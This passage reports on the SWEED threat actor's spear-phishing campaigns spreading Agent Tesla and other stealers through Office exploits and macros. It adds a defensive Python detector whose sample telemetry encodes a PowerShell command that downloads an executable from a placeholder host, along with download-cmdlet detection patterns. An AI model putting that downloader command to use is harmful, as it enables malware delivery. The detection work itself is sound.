SWEED Hackers Target Manufacturing, Logistics Organizations

A threat actor active since at least 2017 has mainly targeted victims with information stealers and remote access Trojans (RATs), Cisco Talos security researchers report.


Referred to as SWEED, the group has been observed using malware such as Formbook, Lokibot and Agent Tesla, consistently distributing them via spear-phishing emails with malicious attachments across its campaigns.


One of the earliest identified SWEED operations used droppers inside ZIP archives to distribute a packed version of the Agent Tesla spyware. The dropper used steganography to decode a .NET executable, which in turn used the same technique to retrieve the final payload, Talos reveals.


In early 2018, the actor was using Java-based droppers to obtain information about the target system and facilitate the download of Agent Tesla.


In April 2018, the actor started employing an exploit for CVE-2017-8759, a remote code execution vulnerability in the Microsoft .NET Framework that can be triggered from an Office document. A PowerPoint slideshow file (PPSX) containing the triggering code was used as the lure.


In May 2018, SWEED switched to abusing another vulnerability in Office, namely CVE-2017-11882. The bug affects the Equation Editor (EQNEDT32.EXE), a decades-old component shipped with the suite.


This year, the actor was observed using malicious macros in Office documents to deliver malware. Spear-phishing emails with malicious attachments remain the entry point. An obfuscated VBA macro in the attachment executes a PowerShell script that performs some environment checks and then downloads an AutoIt-compiled script; that script performs further checks before delivering Agent Tesla.
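As an added example (not code from the Talos report or from SWEED's own tooling), the following Python flags the chain described in this paragraph in process-creation telemetry: an Office application spawning a script host, an encoded PowerShell command that carries a download cmdlet, and a binary launched from a user-writable path two hops below the Office parent. The event layout, field names, process IDs, paths and sample bytes are constructed for the demonstration; the AutoIt-compiled-script marker is checked as a plain substring, which is a simplification of how real scanners locate it.

```python
# Added example, not code from the Talos report or from SWEED's tooling.
# It shows how the macro -> PowerShell -> AutoIt chain can be picked out of
# process-creation telemetry. Events, field names and sample bytes are
# constructed for the demo.
import base64
import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
USER_WRITABLE = re.compile(r"\\(?:temp|appdata|programdata|users\\public)\\", re.I)
DOWNLOADER = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer", re.I
)
# Marker found in AutoIt v3 compiled scripts; assumption: a substring check is enough here.
AUTOIT_MARKER = b"AU3!EA06"


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the newly created process
    cmdline: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_suspicious_chains(events):
    """Return [(pid, [reasons])] for processes whose ancestry matches the chain."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        reasons = []
        parent = by_pid.get(e.ppid)
        grand = by_pid.get(parent.ppid) if parent else None
        name = basename(e.image)
        # Stage 1: Office application launches a script host (macro -> PowerShell).
        if parent and basename(parent.image) in OFFICE_APPS and name in SCRIPT_HOSTS:
            reasons.append("office-spawned-script-host")
            decoded = decode_encoded_command(e.cmdline)
            if decoded is not None:
                reasons.append("encoded-command")
            if DOWNLOADER.search(decoded or e.cmdline):
                reasons.append("downloader")
        # Stage 2: the script host runs a binary from a user-writable path (the AutoIt stage).
        if (grand and basename(grand.image) in OFFICE_APPS
                and basename(parent.image) in SCRIPT_HOSTS
                and USER_WRITABLE.search(e.image)):
            reasons.append("office->script-host->binary-in-user-writable-path")
        if reasons:
            findings.append((e.pid, reasons))
    return findings


def looks_autoit_compiled(data: bytes) -> bool:
    """True if the bytes carry the AutoIt v3 compiled-script marker."""
    return AUTOIT_MARKER in data


# Constructed sample telemetry: Word runs an encoded PowerShell downloader,
# which then launches a binary dropped under %TEMP%. Host/URL are placeholders.
ENCODED = base64.b64encode(
    "(New-Object Net.WebClient).DownloadFile('http://example.invalid/x.exe',$env:TEMP+'\\x.exe')"
    .encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              "WINWORD.EXE /n invoice.docm"),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -nop -w hidden -enc {ENCODED}"),
    ProcEvent(400, 300, r"C:\Users\alice\AppData\Local\Temp\x.exe", "x.exe"),
    ProcEvent(500, 100, r"C:\Windows\System32\notepad.exe", "notepad.exe"),  # benign control
]
# Constructed bytes standing in for a compiled AutoIt script (not a real binary).
SAMPLE_AUTOIT_BLOB = b"MZ" + b"\x00" * 64 + AUTOIT_MARKER + b"\x00" * 16

if __name__ == "__main__":
    for pid, reasons in find_suspicious_chains(SAMPLE_EVENTS):
        print(pid, ", ".join(reasons))
    print("AutoIt marker present:", looks_autoit_compiled(SAMPLE_AUTOIT_BLOB))
```

The two stages are scored independently so that a detection still fires when only one hop is visible (for example, when the PowerShell command line is not captured but the Office-to-temp-binary ancestry is), and the encoded command is decoded before the downloader check so that base64 wrapping does not hide the cmdlet.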


Across several of ..
